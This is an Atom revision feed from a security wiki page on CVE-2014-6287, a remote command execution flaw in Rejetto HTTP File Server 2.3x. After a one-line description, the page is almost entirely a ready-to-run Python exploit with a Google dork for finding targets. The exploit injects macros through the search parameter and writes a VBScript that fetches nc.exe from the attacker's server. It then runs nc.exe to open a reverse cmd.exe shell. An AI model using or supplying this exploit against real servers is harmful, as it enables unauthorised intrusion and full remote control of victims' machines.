<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2014-6287_Rejetto_HTTP_File_Server_%E4%BB%BB%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2014-6287 Rejetto HTTP File Server 任意程序執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2014-6287_Rejetto_HTTP_File_Server_%E4%BB%BB%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2014-6287_Rejetto_HTTP_File_Server_%E4%BB%BB%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T03:15:14Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2014-6287_Rejetto_HTTP_File_Server_%E4%BB%BB%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1103&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary pr...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2014-6287_Rejetto_HTTP_File_Server_%E4%BB%BB%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1103&amp;oldid=prev"/>
		<updated>2021-04-07T08:11:43Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary pr...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution&lt;br /&gt;
# Google Dork: intext:&amp;quot;httpfileserver 2.3&amp;quot;&lt;br /&gt;
# Date: 04-01-2016&lt;br /&gt;
# Remote: Yes&lt;br /&gt;
# Exploit Author: Avinash Kumar Thapa aka &amp;quot;-Acid&amp;quot;&lt;br /&gt;
# Vendor Homepage: http://rejetto.com/&lt;br /&gt;
# Software Link: http://sourceforge.net/projects/hfs/&lt;br /&gt;
# Version: 2.3.x&lt;br /&gt;
# Tested on: Windows Server 2008 , Windows 8, Windows 7&lt;br /&gt;
# CVE : CVE-2014-6287&lt;br /&gt;
# Description: You can use HFS (HTTP File Server) to send and receive files.&lt;br /&gt;
#     It's different from classic file sharing because it uses web technology to be more&lt;br /&gt;
#     compatible with today's Internet. It also differs from classic web servers because&lt;br /&gt;
#     it's very easy to use and runs &amp;quot;right out-of-the box&amp;quot;. Access your remote files, over&lt;br /&gt;
#     the network. It has been successfully tested with Wine under Linux.&lt;br /&gt;
&lt;br /&gt;
# Usage is: python %s &amp;lt;Target IP address&amp;gt; &amp;lt;Target Port Number&amp;gt; &amp;lt;Local ip where http server listen&amp;gt; &amp;lt;local port for the reverse shell&amp;gt;&lt;br /&gt;
# EDB Note: You need to be using a web server hosting netcat (http://&amp;lt;attackers_ip&amp;gt;:80/nc.exe).&lt;br /&gt;
# You may need to run it multiple times for success!&lt;br /&gt;
&lt;br /&gt;
import urllib2 as url&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) == 5:&lt;br /&gt;
  rhost = sys.argv[1]&lt;br /&gt;
  rport = sys.argv[2]&lt;br /&gt;
  lhost = sys.argv[3]  # local IP address&lt;br /&gt;
  lport = sys.argv[4]  # Local Port number&lt;br /&gt;
else:&lt;br /&gt;
  print &amp;quot;[-] Something went wrong..!&amp;quot;&lt;br /&gt;
  print &amp;quot;[-] Usage is: python %s &amp;lt;Target IP address&amp;gt; &amp;lt;Target Port Number&amp;gt; &amp;lt;Local ip where http server listen&amp;gt; &amp;lt;local port for the reverse shell&amp;gt;&amp;quot; % sys.argv[0]&lt;br /&gt;
  print &amp;quot;[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe&amp;quot;&lt;br /&gt;
  sys.exit(-1)&lt;br /&gt;
vbscript=&amp;quot;C:\Users\Public\script.vbs&amp;quot;&lt;br /&gt;
ncdownurl=&amp;quot;http://&amp;quot;+lhost+&amp;quot;/nc.exe&amp;quot;&lt;br /&gt;
ncpathsave=&amp;quot;C:\\Users\\Public\\nc.exe&amp;quot;&lt;br /&gt;
exe1 = &amp;quot;exec|&amp;quot; + &amp;quot;cscript.exe &amp;quot;+vbscript&lt;br /&gt;
exe2 = &amp;quot;exec|&amp;quot; + ncpathsave+&amp;quot; -e cmd.exe &amp;quot; +lhost + &amp;quot; &amp;quot; + lport&lt;br /&gt;
&lt;br /&gt;
save='''save|'''+vbscript+'''|dim xHttp: Set xHttp = createobject(&amp;quot;Microsoft.XMLHTTP&amp;quot;)&lt;br /&gt;
dim bStrm: Set bStrm = createobject(&amp;quot;Adodb.Stream&amp;quot;)&lt;br /&gt;
xHttp.Open &amp;quot;GET&amp;quot;, &amp;quot;'''+ncdownurl+'''&amp;quot;, False&lt;br /&gt;
xHttp.Send&lt;br /&gt;
&lt;br /&gt;
with bStrm&lt;br /&gt;
    .type = 1 '//binary&lt;br /&gt;
    .open&lt;br /&gt;
    .write xHttp.responseBody&lt;br /&gt;
    .savetofile &amp;quot;'''+ncpathsave+'''&amp;quot;, 2 '//overwrite&lt;br /&gt;
end with&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
  # create vbs wget nc.exe&lt;br /&gt;
  url.urlopen(&amp;quot;http://&amp;quot; + rhost + &amp;quot;:&amp;quot; + rport + &amp;quot;/?search=%00{.+&amp;quot; + url.quote(save) + &amp;quot;.}&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
  #execute_script&lt;br /&gt;
  url.urlopen(&amp;quot;http://&amp;quot; + rhost + &amp;quot;:&amp;quot; + rport + &amp;quot;/?search=%00{.+&amp;quot; + url.quote(exe1) + &amp;quot;.}&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
  #nc_run():&lt;br /&gt;
  url.urlopen(&amp;quot;http://&amp;quot; + rhost + &amp;quot;:&amp;quot; + rport + &amp;quot;/?search=%00{.+&amp;quot; + url.quote(exe2) + &amp;quot;.}&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
  print &amp;quot;[-] Something went wrong..!&amp;quot;&lt;br /&gt;
  print &amp;quot;[-] Usage is: python %s &amp;lt;Target IP address&amp;gt; &amp;lt;Target Port Number&amp;gt; &amp;lt;Local ip where http server listen&amp;gt; &amp;lt;local port for the reverse shell&amp;gt;&amp;quot; % sys.argv[0]&lt;br /&gt;
  print &amp;quot;[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe&amp;quot;&lt;br /&gt;
  sys.exit(-1)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>